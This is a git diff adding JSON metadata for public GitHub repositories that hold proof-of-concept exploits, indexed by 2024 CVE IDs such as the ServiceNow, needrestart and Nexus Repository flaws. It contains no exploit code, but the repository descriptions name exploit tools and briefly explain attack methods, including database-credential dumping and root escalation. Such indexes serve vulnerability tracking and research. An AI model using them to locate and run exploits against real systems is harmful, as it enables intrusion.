"description": null, + "fork": false, + "created_at": "2024-07-15T12:27:33Z", + "updated_at": "2024-07-15T13:22:33Z", + "pushed_at": "2024-07-15T13:22:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829246851, + "name": "CVE-2024-4879-ServiceNow", + "full_name": "Praison001\/CVE-2024-4879-ServiceNow", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-4879-ServiceNow", + "description": "Exploit for CVE-2024-4879 affecting Vancouver, Washington DC Now and Utah Platform releases", + "fork": false, + "created_at": "2024-07-16T04:03:28Z", + "updated_at": "2024-07-16T04:27:47Z", + "pushed_at": "2024-07-16T04:26:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834723031, + "name": "CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning", + "full_name": "NoTsPepino\/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning", + "owner": { + "login": "NoTsPepino", + "id": 107086092, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107086092?v=4", + "html_url": "https:\/\/github.com\/NoTsPepino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NoTsPepino\/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning", + "description": "CVE-2024-4879 & CVE-2024-5217 ServiceNow RCE Scanning Using Nuclei & Shodan Dork to find it.", + "fork": false, + "created_at": "2024-07-28T06:51:33Z", + "updated_at": "2024-08-07T14:31:30Z", + "pushed_at": "2024-08-03T03:09:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842345831, + "name": "CVE-2024-4879", + "full_name": "jdusane\/CVE-2024-4879", + "owner": { + "login": "jdusane", + "id": 16679951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16679951?v=4", + "html_url": "https:\/\/github.com\/jdusane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jdusane\/CVE-2024-4879", + "description": "Python script designed to detect specific vulnerabilities in ServiceNow instances and dump database connection details if the vulnerability is found. This tool is particularly useful for security researchers and penetration testers.", + "fork": false, + "created_at": "2024-08-14T06:55:41Z", + "updated_at": "2024-08-14T07:00:05Z", + "pushed_at": "2024-08-14T07:00:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848057101, + "name": "CVE-2024-4879", + "full_name": "gh-ost00\/CVE-2024-4879", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-4879", + "description": "Jelly Template Injection Vulnerability in ServiceNow | POC CVE-2024-4879", + "fork": false, + "created_at": "2024-08-27T03:43:28Z", + "updated_at": "2024-09-12T02:37:10Z", + "pushed_at": "2024-08-27T03:56:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856665318, + "name": "CVE-2024-4879", + "full_name": "0xWhoami35\/CVE-2024-4879", + "owner": { + "login": "0xWhoami35", + "id": 107396843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107396843?v=4", + "html_url": "https:\/\/github.com\/0xWhoami35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xWhoami35\/CVE-2024-4879", + "description": null, + "fork": false, + "created_at": "2024-09-13T01:20:34Z", + "updated_at": "2024-09-13T01:33:09Z", + "pushed_at": "2024-09-13T01:33:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4883.json b/2024/CVE-2024-4883.json new file mode 100644 index 0000000000..54d67cb398 --- /dev/null +++ b/2024/CVE-2024-4883.json @@ -0,0 +1,33 @@ +[ + { + "id": 825745361, + "name": "CVE-2024-4883", + "full_name": "sinsinology\/CVE-2024-4883", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-4883", + "description": "Exploit for CVE-2024-4883", + "fork": false, + "created_at": "2024-07-08T12:14:01Z", + "updated_at": "2024-11-20T16:30:55Z", + "pushed_at": "2024-07-08T12:14:18Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4885.json b/2024/CVE-2024-4885.json new file mode 100644 index 0000000000..d46c5c2073 --- /dev/null +++ b/2024/CVE-2024-4885.json @@ -0,0 +1,33 @@ +[ + { + "id": 825745644, + "name": "CVE-2024-4885", + "full_name": "sinsinology\/CVE-2024-4885", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-4885", + "description": "Exploit for CVE-2024-4885", + "fork": false, + "created_at": "2024-07-08T12:14:42Z", + "updated_at": "2024-11-20T16:30:55Z", + "pushed_at": "2024-07-08T12:15:00Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48914.json b/2024/CVE-2024-48914.json new file mode 100644 index 0000000000..f05a37340e --- /dev/null +++ b/2024/CVE-2024-48914.json @@ -0,0 +1,41 @@ +[ + { + "id": 876045350, + "name": "CVE-2024-48914", + "full_name": "EQSTLab\/CVE-2024-48914", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-48914", + "description": "PoC for CVE-2024-48914", + "fork": false, + "created_at": "2024-10-21T10:02:05Z", + "updated_at": "2024-11-20T16:31:08Z", + "pushed_at": "2024-10-21T10:50:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "poc", + "proof-of-concept", + "security", + "typescript", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48955.json b/2024/CVE-2024-48955.json new file mode 100644 index 0000000000..1bba542e48 --- /dev/null +++ b/2024/CVE-2024-48955.json @@ -0,0 +1,33 @@ +[ + { + "id": 880290163, + "name": "CVE-2024-48955_Overview", + "full_name": "BrotherOfJhonny\/CVE-2024-48955_Overview", + "owner": { + "login": "BrotherOfJhonny", + "id": 28454566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28454566?v=4", + "html_url": "https:\/\/github.com\/BrotherOfJhonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrotherOfJhonny\/CVE-2024-48955_Overview", + "description": "CVE-2024-48955_Overview", + "fork": false, + "created_at": "2024-10-29T13:14:19Z", + "updated_at": "2024-10-29T13:32:43Z", + "pushed_at": "2024-10-29T13:32:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4898.json b/2024/CVE-2024-4898.json new file mode 100644 index 0000000000..c9a567acce --- /dev/null +++ b/2024/CVE-2024-4898.json @@ -0,0 +1,64 @@ +[ + { + "id": 814085219, + "name": "CVE-2024-4898-Poc", + "full_name": "truonghuuphuc\/CVE-2024-4898-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4898-Poc", + "description": "CVE-2024-4898 InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.38 - Missing Authorization to Unauthenticated API setup\/Arbitrary Options Update\/Administrative User Creation", + "fork": false, + "created_at": "2024-06-12T10:03:14Z", + "updated_at": "2024-10-15T23:45:27Z", + "pushed_at": "2024-06-12T10:23:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815012905, + "name": "CVE-2024-4898-Poc", + "full_name": "cve-2024\/CVE-2024-4898-Poc", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-4898-Poc", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:01:58Z", + "updated_at": "2024-06-14T07:03:55Z", + "pushed_at": "2024-06-14T07:03:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48990.json b/2024/CVE-2024-48990.json new file mode 100644 index 0000000000..ac3a06f000 --- /dev/null +++ b/2024/CVE-2024-48990.json @@ -0,0 +1,256 @@ +[ + { + "id": 891671184, + "name": "CVE-2024-48990-PoC", + "full_name": "makuga01\/CVE-2024-48990-PoC", + "owner": { + "login": "makuga01", + "id": 20490978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20490978?v=4", + "html_url": "https:\/\/github.com\/makuga01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/makuga01\/CVE-2024-48990-PoC", + "description": "PoC for CVE-2024-48990", + "fork": false, + "created_at": "2024-11-20T18:41:25Z", + "updated_at": "2024-11-28T13:57:03Z", + "pushed_at": "2024-11-20T18:49:33Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 83, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892345016, + "name": "CVE-2024-48990", + "full_name": "ns989\/CVE-2024-48990", + "owner": { + "login": "ns989", + "id": 75913553, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75913553?v=4", + "html_url": "https:\/\/github.com\/ns989", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ns989\/CVE-2024-48990", + "description": "Exploit for CVE-2024-48990 (Local Privilege Escalation in needrestart < 3.8)", + "fork": false, + "created_at": "2024-11-21T23:59:49Z", + "updated_at": "2024-11-22T01:17:03Z", + "pushed_at": "2024-11-22T01:17:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892744239, + "name": "CVE-2024-48990", + "full_name": "felmoltor\/CVE-2024-48990", + "owner": { + "login": "felmoltor", + "id": 846513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/846513?v=4", + "html_url": "https:\/\/github.com\/felmoltor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/felmoltor\/CVE-2024-48990", + "description": "Qualys needsrestart vulnerability CVE-2024-48990", + "fork": false, + "created_at": "2024-11-22T17:35:58Z", + "updated_at": "2024-11-22T18:32:05Z", + "pushed_at": "2024-11-22T17:41:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893279532, + "name": "CVE-2024-48990-PoC", + "full_name": "Cyb3rFr0g\/CVE-2024-48990-PoC", + "owner": { + "login": "Cyb3rFr0g", + "id": 65209938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65209938?v=4", + "html_url": "https:\/\/github.com\/Cyb3rFr0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rFr0g\/CVE-2024-48990-PoC", + "description": "My take on the needrestart Python CVE-2024-48990", + "fork": false, + "created_at": "2024-11-24T02:12:36Z", + "updated_at": "2024-11-25T09:01:21Z", + "pushed_at": "2024-11-24T02:32:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893347321, + "name": "CVE-2024-48990-PoC-Testing", + "full_name": "pentestfunctions\/CVE-2024-48990-PoC-Testing", + "owner": { + "login": "pentestfunctions", + "id": 144001335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144001335?v=4", + "html_url": "https:\/\/github.com\/pentestfunctions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentestfunctions\/CVE-2024-48990-PoC-Testing", + "description": "Testing POC for use cases", + "fork": false, + "created_at": "2024-11-24T07:33:06Z", + "updated_at": "2024-11-27T22:55:46Z", + "pushed_at": "2024-11-24T07:56:49Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893500783, + "name": "CVE-2024-48990-exploit", + "full_name": "r0xdeadbeef\/CVE-2024-48990-exploit", + "owner": { + "login": "r0xdeadbeef", + "id": 65211256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65211256?v=4", + "html_url": "https:\/\/github.com\/r0xdeadbeef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0xdeadbeef\/CVE-2024-48990-exploit", + "description": "Needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable.", + "fork": false, + "created_at": "2024-11-24T15:57:45Z", + "updated_at": "2024-11-26T01:02:14Z", + "pushed_at": "2024-11-24T17:47:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893561658, + "name": "needrestart-vulnerability-poc", + "full_name": "njeru-codes\/needrestart-vulnerability-poc", + "owner": { + "login": "njeru-codes", + "id": 111843624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111843624?v=4", + "html_url": "https:\/\/github.com\/njeru-codes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/njeru-codes\/needrestart-vulnerability-poc", + "description": "A Local Privilege Escalation poc scipts for CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003", + "fork": false, + "created_at": "2024-11-24T18:54:42Z", + "updated_at": "2024-11-24T19:14:23Z", + "pushed_at": "2024-11-24T19:14:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10224", + "cve-2024-11003", + "cve-2024-48990", + "cve-2024-48991", + "cve-2024-48992" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893730273, + "name": "CVE-2024-48990-Exploit", + "full_name": "ally-petitt\/CVE-2024-48990-Exploit", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-48990-Exploit", + "description": "My exploit for CVE-2024-48990. Full details of how I made this are on my blog.", + "fork": false, + "created_at": "2024-11-25T05:28:20Z", + "updated_at": "2024-11-25T05:29:14Z", + "pushed_at": "2024-11-25T05:29:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49039.json b/2024/CVE-2024-49039.json new file mode 100644 index 0000000000..d411568f2e --- /dev/null +++ b/2024/CVE-2024-49039.json @@ -0,0 +1,33 @@ +[ + { + "id": 890829788, + "name": "WPTaskScheduler_CVE-2024-49039", + "full_name": "je5442804\/WPTaskScheduler_CVE-2024-49039", + "owner": { + "login": "je5442804", + "id": 41533878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41533878?v=4", + "html_url": "https:\/\/github.com\/je5442804", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/je5442804\/WPTaskScheduler_CVE-2024-49039", + "description": "WPTaskScheduler RPC Persistence & CVE-2024-49039 via Task Scheduler", + "fork": false, + "created_at": "2024-11-19T08:57:18Z", + "updated_at": "2024-11-28T09:23:17Z", + "pushed_at": "2024-11-19T09:15:26Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49203.json b/2024/CVE-2024-49203.json new file mode 100644 index 0000000000..e7b0e32af4 --- /dev/null +++ b/2024/CVE-2024-49203.json @@ -0,0 +1,33 @@ +[ + { + "id": 869521489, + "name": "CVE-2024-49203", + "full_name": "CSIRTTrizna\/CVE-2024-49203", + "owner": { + "login": "CSIRTTrizna", + "id": 170928596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170928596?v=4", + "html_url": "https:\/\/github.com\/CSIRTTrizna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CSIRTTrizna\/CVE-2024-49203", + "description": null, + "fork": false, + "created_at": "2024-10-08T12:42:59Z", + "updated_at": "2024-11-21T12:13:41Z", + "pushed_at": "2024-11-21T12:13:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49328.json b/2024/CVE-2024-49328.json new file mode 100644 index 0000000000..66f9a0f51b --- /dev/null +++ b/2024/CVE-2024-49328.json @@ -0,0 +1,33 @@ +[ + { + "id": 884373508, + "name": "CVE-2024-49328", + "full_name": "RandomRobbieBF\/CVE-2024-49328", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-49328", + "description": "WP REST API FNS <= 1.0.0 - Privilege Escalation", + "fork": false, + "created_at": "2024-11-06T16:25:59Z", + "updated_at": "2024-11-18T17:47:41Z", + "pushed_at": "2024-11-06T16:28:46Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49368.json b/2024/CVE-2024-49368.json new file mode 100644 index 0000000000..4c6f4cf1d2 --- /dev/null +++ b/2024/CVE-2024-49368.json @@ -0,0 +1,33 @@ +[ + { + "id": 887035757, + "name": "CVE-2024-49368", + "full_name": "Aashay221999\/CVE-2024-49368", + "owner": { + "login": "Aashay221999", + "id": 43607208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43607208?v=4", + "html_url": "https:\/\/github.com\/Aashay221999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aashay221999\/CVE-2024-49368", + "description": "Explorations of CVE-2024-49368 + Exploit Development", + "fork": false, + "created_at": "2024-11-12T03:50:46Z", + "updated_at": "2024-11-12T03:56:07Z", + "pushed_at": "2024-11-12T03:56:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49379.json b/2024/CVE-2024-49379.json new file mode 100644 index 0000000000..2fa0edc9cc --- /dev/null +++ b/2024/CVE-2024-49379.json @@ -0,0 +1,33 @@ +[ + { + "id": 889610570, + "name": "CVE-2024-49379", + "full_name": "OHDUDEOKNICE\/CVE-2024-49379", + "owner": { + "login": "OHDUDEOKNICE", + "id": 38146523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38146523?v=4", + "html_url": "https:\/\/github.com\/OHDUDEOKNICE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OHDUDEOKNICE\/CVE-2024-49379", + "description": "CVE-2024-49379 PoC", + "fork": false, + "created_at": "2024-11-16T19:05:28Z", + "updated_at": "2024-11-20T16:31:11Z", + "pushed_at": "2024-11-16T19:31:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4956.json b/2024/CVE-2024-4956.json new file mode 100644 index 0000000000..09efef9436 --- /dev/null +++ b/2024/CVE-2024-4956.json @@ -0,0 +1,526 @@ +[ + { + "id": 804730274, + "name": "CVE-2024-4956", + "full_name": "banditzCyber0x\/CVE-2024-4956", + "owner": { + "login": "banditzCyber0x", + "id": 96621905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96621905?v=4", + "html_url": "https:\/\/github.com\/banditzCyber0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/banditzCyber0x\/CVE-2024-4956", + "description": "Nexus Repository Manager 3 Unauthenticated Path Traversal", + "fork": false, + "created_at": "2024-05-23T06:47:13Z", + "updated_at": "2024-07-03T14:20:22Z", + "pushed_at": "2024-05-26T07:52:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804764039, + "name": "CVE-2024-4956", + "full_name": "xungzzz\/CVE-2024-4956", + "owner": { + "login": "xungzzz", + "id": 78672731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78672731?v=4", + "html_url": "https:\/\/github.com\/xungzzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xungzzz\/CVE-2024-4956", + "description": "CVE-2024-4956 Nuclei Template", + "fork": false, + "created_at": "2024-05-23T08:15:08Z", + "updated_at": "2024-05-26T08:07:28Z", + "pushed_at": "2024-05-23T08:16:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804844993, + "name": "CVE-2024-4956", + "full_name": "erickfernandox\/CVE-2024-4956", + "owner": { + "login": "erickfernandox", + "id": 2186082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2186082?v=4", + "html_url": "https:\/\/github.com\/erickfernandox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erickfernandox\/CVE-2024-4956", + "description": "Unauthenticated Path Traversal in Nexus Repository 3 ", + "fork": false, + "created_at": "2024-05-23T11:39:06Z", + "updated_at": "2024-10-04T11:42:50Z", + "pushed_at": "2024-05-23T20:59:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805374933, + "name": "CVE-2024-4956", + "full_name": "gmh5225\/CVE-2024-4956", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2024-4956", + "description": "Unauthenticated Path Traversal in Nexus Repository 3 ", + "fork": false, + "created_at": "2024-05-24T12:45:45Z", + "updated_at": "2024-07-21T07:24:48Z", + "pushed_at": "2024-05-23T20:59:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 806026716, + "name": "CVE-2024-4956-Bulk-Scanner", + "full_name": "ifconfig-me\/CVE-2024-4956-Bulk-Scanner", + "owner": { + "login": "ifconfig-me", + "id": 25315805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4", + "html_url": "https:\/\/github.com\/ifconfig-me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-4956-Bulk-Scanner", + "description": "[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner", + "fork": false, + "created_at": "2024-05-26T06:50:48Z", + "updated_at": "2024-11-23T09:28:58Z", + "pushed_at": "2024-09-26T23:28:20Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806352821, + "name": "CVE-2024-4956-PoC", + "full_name": "thinhap\/CVE-2024-4956-PoC", + "owner": { + "login": "thinhap", + "id": 104897146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104897146?v=4", + "html_url": "https:\/\/github.com\/thinhap", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thinhap\/CVE-2024-4956-PoC", + "description": null, + "fork": false, + "created_at": "2024-05-27T03:09:36Z", + "updated_at": "2024-07-04T01:22:44Z", + "pushed_at": "2024-05-27T03:14:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + 